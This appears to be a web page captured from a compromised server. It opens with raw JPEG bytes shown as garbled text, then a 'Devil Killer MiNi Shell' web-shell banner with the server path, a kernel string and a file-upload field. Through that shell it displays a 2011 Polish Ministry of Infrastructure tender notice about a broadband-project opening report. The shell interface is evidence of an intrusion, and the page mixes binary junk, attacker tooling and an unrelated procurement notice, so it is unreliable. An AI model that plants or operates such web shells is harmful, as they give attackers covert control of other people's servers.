JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111003/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111003/316956-N-2011.html

<p class="kh_header"><b>Warszawa: wykonanie opracowania pn. Raport Otwarcia w ramach Projektu systemowego - działania na rzecz rozwoju szerokopasmowego dostępu do Internetu</b><br>
<b>Numer ogłoszenia: 316956 - 2011; data zamieszczenia: 03.10.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ministerstwo Infrastruktury , ul. Chałubińskiego 4/6, 00-928 Warszawa, woj. mazowieckie, tel. 022 6301649, faks 022 6301649.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mi.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> wykonanie opracowania pn. Raport Otwarcia w ramach Projektu systemowego - działania na rzecz rozwoju szerokopasmowego dostępu do Internetu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia

Wykonanie opracowania pn. Raport Otwarcia w ramach Projektu systemowego - działania na rzecz rozwoju szerokopasmowego dostępu do Internetu.

1. Wstęp
1.1 . Kontekst opracowania
W Polsce w ramach Regionalnych Programów Operacyjnych, Programu Operacyjnego Rozwój Polski Wschodniej, a także działania 8.4 Programu Operacyjnego Innowacyjna Gospodarka przewidziano 1,034 mld EUR na budowę infrastruktury szerokopasmowej. Dodatkowo w ramach działania 8.3 POIG dostępne są środki na walkę z wykluczeniem cyfrowym. W związku z niskim stanem wydatkowania środków, rozpoczęła się realizacja Projektu systemowego - działania na rzecz rozwoju szerokopasmowego dostępu do Internetu w ramach działania 8.3 POIG. Projekt ten polega na:
- prowadzeniu działań koordynacyjnych na poziomie strategicznym w celu ograniczenia barier w dostępie do Internetu,
- wspieraniu potencjalnych beneficjentów w zakresie prowadzonych inwestycji,
- zwiększeniu dostępu do wiedzy i innowacyjnych rozwiązań technologicznych (wsparcie doradcze),
- prowadzeniu działań informacyjnych oraz szkoleniowych (organizowanie seminariów, konferencji, akcji szkoleniowych i edukacyjnych).

Szczególnym celem projektu jest zapewnienie profesjonalnej i szybkiej pomocy 
dla beneficjentów w realizacji projektów szerokopasmowych. 
Przygotowanie i realizacja projektów napotyka często na problemy, które mogą powodować lub powodują znaczne opóźnienia w ich wdrażaniu, a w skrajnych przypadkach nawet zagrożenie niezrealizowania projektu. Do najważniejszych problemów zidentyfikowanych w ramach monitorowania stanu zaawansowania inwestycji należą m.in.:

- problemy z zapewnieniem finansowania projektów,
- problemy związane ze zmieniającymi się w toku realizacji projektu uregulowaniami prawnymi,
- problemy z zagadnieniami związanymi z pomocą publiczną,
- brak wykwalifikowanej kadry pracowniczej, dysponującej odpowiednią wiedzą i doświadczeniem z zakresu przygotowania, wdrażania i rozliczania projektów unijnych (na poziomie beneficjenta projektu),
- przedłużające się uzgodnienia pomiędzy beneficjentem projektu a innymi podmiotami, których realizacja projektu dotyczy pośrednio (np. konieczność uzgodnienia projektów budowlanych z podmiotami, których tereny sąsiadują z inwestycją),
- brak wykwalifikowanej kadry inżynierskiej,
- ograniczony potencjał rynku wykonawców - uwarunkowany specyfiką realizowanych inwestycji.

Zważywszy, że projekty w ramach Programów Operacyjnych są na różnym etapie realizacji, a okres do zakończenia realizacji projektów jest krótki, dla celów realizacji projektu systemowego konieczne jest sporządzenie Raportu Otwarcia, w którym zostaną zinwentaryzowane informacje dotyczące projektów teleinformatycznych w Polsce, w szczególności w zakresie stanu zaawansowania projektów, gdyż obecnie nie istnieje w Polsce taka baza informacji, a ministerstwa czy urzędy centralne nie dysponują kompleksową wiedzą w tym zakresie. Opracowany Raport Otwarcia będzie podstawą wyznaczenia szczegółowych zadań o charakterze: 
a) doradczym, a w szczególności stworzenie modelowych dokumentów, wparcie doradczo-eksperckie, prawne, szkoleniowo: informacyjne, informowanie o dobrych praktykach,
b) organizacyjnym, a w szczególności usprawnienie systemu przepływu informacji, poszerzenie liczby podmiotów służących wsparciem potencjalnym beneficjentom,
c) technicznym, a w szczególności przygotowanie analiz technicznych, dywersyfikacja kanałów dostępu do informacji o infrastrukturze szerokopasmowej i zasadach finansowania inwestycji,
d) ekonomicznym, a szczególności: zapewnienie efektywnego i celowego wydatkowania środków publicznych
- dla podmiotu, który będzie wykonywał bezpośrednie działania wspierające beneficjentów w ramach projektu systemowego.

1.2. Cel opracowania
Celem wykonania opracowania pn. Raport Otwarcia w ramach Projektu systemowego - działania na rzecz rozwoju szerokopasmowego dostępu do Internetu. jest przede wszystkim:
1. zebranie dokładnych i aktualnych danych dotyczących stanu zaawansowania projektów objętych badaniem;
2. określenie konkretnych problemów i barier utrudniających, opóźniających 
      lub blokujących realizację projektów objętych badaniem,
3. wskazanie wniosków i rekomendacji w zakresie rozwiązania problemów i barier utrudniających, opóźniających lub blokujących realizację projektów objętych badaniem.

Zebrane informacje stanowić będą podstawę do opracowania planu związanego z udzieleniem doradztwa w zakresie aspektów prawnych, organizacyjnych, technicznych dla przedsięwzięć realizowanych przez JST (plan działań), jednocześnie uwzględniając koordynacje działań na poziomie strategicznym w zakresie ograniczania barier dostępu do Internetu. Co więcej, Raport Otwarcia stanowić będzie niezbędny punkt wyjściowy do wypracowania schematu działań w zakresie działań koordynacyjnych na poziomie strategicznym w celu ograniczenia barier w dostępie do Internetu. 
Badanie projektów, o których mowa w pkt 2.1 powinno zostać przeprowadzone przede wszystkim w drodze bezpośrednich osobistych wywiadów z przedstawicielami podmiotów realizujących projekty szerokopasmowe oraz przedstawicielami instytucji koordynujących, instytucji zarządzających, instytucji pośredniczących w ramach poszczególnych programów operacyjnych, w toku których wypełnione zostaną ankiety przekazane Wykonawcy przez Zamawiającego (Załącznik 8 do SIWZ). 
Po zebraniu w/w danych, powinny zostać sporządzone także wnioski i rekomendacje, zawierające identyfikację, analizę i ocenę wszystkich problemów występujących podczas realizacji projektów szerokopasmowych. 
Przeprowadzona analiza  będzie miała również na celu uzyskanie informacji, które:
1. pozwolą na ocenę stanu realizacji projektów w ramach ww. działań,
2. pomogą usprawnić działania podejmowane przez beneficjentów i instytucje zaangażowane w realizację projektów objętych analizą,
3. pozwolą na zapewnienie profesjonalnego doradztwa dla beneficjentów projektów, dla instytucji biorących udział w ich wdrażaniu, do wykorzystania również w przyszłej perspektywie finansowej.

Formułując wnioski i rekomendacje Wykonawca bierze pod uwagę m.in.:
- obecny stan i udostępnione plany rozwoju sieci telekomunikacyjnych należących do głównych operatorów działających na rynku polskim,
- aktualny stan zaawansowania prac projektowych realizowanych w ramach PO RPW, RPO i POIG (działania 8.3 i 8.4),
-obecny stan i plany rozwoju sieci telekomunikacyjnych realizowanych 
przez jednostki samorządu terytorialnego,
- dostępne i możliwe do wykorzystania technologie dostarczania Internetu,
- wymagania UE w zakresie realizacji projektów teleinformatycznych oraz 
dot. wykorzystania środków finansowych.

2 . Zakres opracowania - kwestie i pytania 
2.1 . Przedmiot opracowania
Badaniu powinny zostać poddane:
1. Projekty, których celem jest rozwój infrastruktury telekomunikacyjnej, realizowane w ramach szesnastu Regionalnych Programów Operacyjnych 2007 - 2013.
2. Projekt Sieć Szerokopasmowa Polski Wschodniej, realizowany w ramach Programu Operacyjnego Rozwój Polski Wschodniej 2007 - 2013. 
3. Projekty w ramach działania 8.3 i 8.4 Programu Operacyjnego Innowacyjna Gospodarka 2007 - 2013, wybrane według następującego klucza:
a) w każdym województwie wybierane jest 5 projektów, o najwyższej wartości dofinansowania. 
b) w województwach, w których liczba projektów jest równa lub niższa niż pięć, analizie należy poddać wszystkie projekty.

- Zakres czasowy - dotyczy okresu od początku realizacji projektów z w/w zakresu, do momentu przeprowadzania przedmiotowej analizy. 
- Zakres przestrzenny -   zgodny z miejscem realizacji projektów.
2.2  Pytania 

W celu przeprowadzenia badania, sporządzono ankiety, stanowiące Załącznik nr 8 do SIWZ

3. Oczekiwana metodyka

Zgodnie z przyjętą koncepcją realizacji przedmiotu umowy Wykonawca może postawić dodatkowe pytania. W celu uzyskania odpowiedzi na przedstawione powyżej pytania i zagadnienia badawcze oraz dodatkowe, które zidentyfikuje Wykonawca zgodnie ze swoją wiedzą, doświadczeniem i zakresem badania, przeprowadzone badanie powinno obejmować jak najszersze spektrum metodologiczne, tak by zapewnić triangulację zarówno metod, technik jak 
i źródeł danych wykorzystywanych w badaniu.. Zamawiający oczekuje, aby w ramach zidentyfikowanych zagadnień, Wykonawca zrealizował co najmniej następujące działania:
- analiza danych zastanych, 
- analizy eksperckie udostępnionej dokumentacji pod kątem problemów występujących podczas przygotowania/realizacji poszczególnych projektów oraz przyjętych przez Beneficjentów rozwiązań pod kątem skuteczności w rozwiązywaniu tych problemów,
- wywiady  środowiskowe:
- pogłębione wywiady indywidualne (IDI) lub zogniskowane wywiady grupowe (FGI) 
z Beneficjentami projektów, przeprowadzane osobiście,

Ponadto dane szczegółowe powinny zostać pobrane od podmiotów zaangażowanych instytucjonalnie w projekty z zakresu budowy infrastruktury teleinformatycznej, tj. w  szczególności UKE, MRR, MSWiA, Władzy Wdrażającej Programy Europejskie. Dlatego też Ministerstwo Infrastruktury wystąpi do ww. instytucji z prośbą o udostępnienie ww. danych Wykonawcy. 

Podane powyżej narzędzia  mogą zostać rozszerzone przez Wykonawcę.
4. Oczekiwana organizacja i plan pracy
4.1 Wymagania kadrowe wobec Wykonawcy
Wykonawca powinien wykazać, że w okresie trzech  lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie, wykonał należycie co najmniej trzy projekty analityczne, ekspertyzy  lub projekty ewaluacyjne, w  tym dwa z obszaru związanego z inwestycjami w telekomunikacyjne sieci szerokopasmowe o wartości co najmniej 50 000,00 PLN brutto każde.
Ponadto Wykonawca powinien dysponować zespołem ekspertów, posiadających następujące kwalifikacje:
a) kierownik zespołu posiadający: 
- doświadczenie w kierowaniu co najmniej 3 badaniami ewaluacyjnymi i/lub analizami w zakresie projektów związanych z inwestycjami w telekomunikacyjne sieci,
- co najmniej roczne doświadczenie zawodowe z zakresu wdrażania funduszy Unii Europejskiej;
b) zespół badawczy składający się minimum z 5 osób, spełniających następujące warunki:
Specjalista 1:
-  posiada wykształcenie wyższe, 
- posiada co najmniej 2-letnie doświadczenie w zakresie realizacji projektów w obszarze inwestycji   telekomunikacyjnych finansowanych z funduszy UE. 
Specjalista 2:
-  posiada wykształcenie wyższe prawnicze,
- posiada co najmniej  2 - letnie doświadczenie zawodowe w zakresie prawa zamówień publicznych w obszarze realizacji projektów inwestycyjnych (pod pojęciem projektów inwestycyjnych Zamawiający rozumie budowę/modernizację infrastruktury liniowej), tj. np. uczestniczył w procesie przygotowania lub prowadzenia postępowań przetargowych lub w procesie przygotowywania ofert lub realizacji zamówień.
Min. 1 osoba z wykształceniem wyższym prawniczym, spełniająca łącznie następujące warunki:
- posiada co najmniej roczne doświadczenie zawodowe w zakresie prawa unijnego w  obszarze realizacji  inwestycji telekomunikacyjnych, w tym znajomość zagadnień dotyczących występowania pomocy publicznej,
- posiada co najmniej roczne doświadczenie zawodowe  w zakresie prawa krajowego i  unijnego w obszarze prawa telekomunikacyjnego oraz wdrażania programów finansowanych z udziałem środków europejskich.
Min. 1 osoba z wyższym wykształceniem technicznym oraz min. 1 osoba z  wyższym wykształceniem ekonomicznym, spełniające następujący warunek:
- posiada co najmniej roczne doświadczenie zawodowe  związane z realizacją projektów inwestycyjnych w zakresie telekomunikacji (wynikające z pracy na stanowisku wiążącym się z wykonywaniem zadań w tym obszarze lub uczestnictwa w procesie realizacji projektów w tym obszarze).

4.2 Harmonogram realizacji

Zakłada się, że Wykonawca zrealizuje przedmiot zamówienia w terminie maksymalnie 45 dni od dnia zawarcia umowy.

5. Oczekiwane produkty i rezultaty
1. Raport otwarcia w formie drukowanej (2 egzemplarze) i elektronicznej (2 egzemplarze na płytach CD) - w formacie DOC oraz PDF, obejmujący:
o Spis treści,
o Wprowadzenie zawierające opis celów badania, skrócony opis zastosowanej metodologii oraz źródła informacji wykorzystane w badaniu,
o Opis wyników badania, ich interpretację, z uwzględnieniem podziału na poszczególne projekty (w tym matryca ryzyk i katalog złych praktyk),
o Zestawienie wniosków i rekomendacji skierowanych do instytucji zaangażowanych we wdrażanie projektów,
o Załączniki - szczegółowe informacje, w tym w szczególności wszystkie zebrane i wypełnione w toku badania ankiety, posegregowane według programów i województw itp.

Wszystkie dokumenty przekazywane Zamawiającemu w wersji elektronicznej powinny być zapisane w formatach DOC oraz PDF.

2. Prezentację multimedialną wyników badania - maksymalnie 20 slajdów zawierających najważniejsze elementy Raportu otwarcia w tym rekomendacje - na płytach CD wraz z raportem końcowym, ewentualnie wydruk na potrzeby prezentacji konsultacyjnej z adresatami badania.

6. Planowane wykorzystanie wyników
Wiedza zawarta w Raporcie otwarcia  zostanie wykorzystana dla celów przygotowania dalszych działań w ramach projektu systemowego, którego cele zostały zidentyfikowane w Szczegółowym opisie przedmiotu zamówienia w pkt. 1.1.

7. Dokumenty wytworzone przez Wykonawcę powinny zostać opatrzone Wzorem wizualizacji zamieszczonym w Załączniku Nr 9 do SIWZ.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.00.00.00-4, 79.31.12.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 45.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełniających ten warunek udziału w postępowaniu zostaną uznani Wykonawcy, którzy w okresie trzech lat przed upływem terminu składania ofert w postępowaniu, a jeżeli okres działalności jest krótszy - w tym okresie, wykonali co najmniej trzy  projekty analityczne, ekspertyzy lub  projekty ewaluacyjne, w tym dwa z obszaru związanego z inwestycjami w telekomunikacyjne sieci szerokopasmowe o wartości co najmniej 50 000,00 PLN brutto każde</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełniających ten warunek udziału w postępowaniu zostaną uznani Wykonawcy, którzy dysponują lub będą dysponować Zespołem ekspertów, którzy będą uczestniczyć w wykonywaniu zamówienia, w tym:
a) kierownik zespołu posiadający: 
- doświadczenie w kierowaniu co najmniej 3 badaniami ewaluacyjnymi i/lub analizami w zakresie projektów związanych z inwestycjami w sieci telekomunikacyjne,
- co najmniej roczne doświadczenie zawodowe z zakresu wdrażania funduszy Unii Europejskiej;

b) zespół badawczy składający się minimum z 5 osób, spełniających następujące warunki:
Specjalista 1:
-  posiada wykształcenie wyższe, 
- posiada co najmniej 2-letnie doświadczenie w zakresie realizacji projektów w obszarze inwestycji   telekomunikacyjnych finansowanych z funduszy UE. 
Specjalista 2:
-  posiada wykształcenie wyższe prawnicze,
- posiada co najmniej 2 - letnie doświadczenie zawodowe w zakresie prawa zamówień publicznych w obszarze realizacji projektów inwestycyjnych (pod pojęciem projektów inwestycyjnych Zamawiający rozumie budowę/modernizację infrastruktury liniowej), tj. np. uczestniczył w procesie przygotowania lub prowadzenia postępowań przetargowych lub w procesie przygotowywania ofert lub realizacji zamówień.
Min. 1 osoba z wykształceniem wyższym prawniczym, spełniająca łącznie następujące warunki:
- posiada co najmniej roczne doświadczenie zawodowe w zakresie prawa unijnego w obszarze realizacji  inwestycji telekomunikacyjnych, w tym znajomość zagadnień dotyczących występowania pomocy publicznej,
- posiada co najmniej roczne doświadczenie zawodowe  w zakresie prawa krajowego i unijnego w obszarze prawa telekomunikacyjnego oraz wdrażania programów finansowanych z udziałem środków europejskich.
Min. 1 osoba z wyższym wykształceniem technicznym oraz min. 1 osoba z  wyższym wykształceniem ekonomicznym, spełniające następujący warunek:
- posiada co najmniej roczne doświadczenie zawodowe  związane z realizacją projektów inwestycyjnych w zakresie telekomunikacji (wynikające z pracy na stanowisku wiążącym się z wykonywaniem zadań w tym obszarze lub uczestnictwa w procesie realizacji projektów w tym obszarze).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje opisu sposobu dokonywania oceny spełniania tego warunku</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 30</li>
<li>2 - Zawartość koncepcji - 40</li>
<li>3 - Termin realizacji - 30</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mi.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ministerstwo Infrastruktury
Biuro Dyrektora Generalnego 
Wydział Zamówień Publicznych 
ul. Chałubińskiego 4/6, bud. A pok. 225
00-928 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.10.2011 godzina 13:00, miejsce: Ministerstwo Infrastruktury
Departament Telekomunikacji
ul. Chałubińskiego 4/6, bud. A pok. 502
00-928 Warszawa.</p>
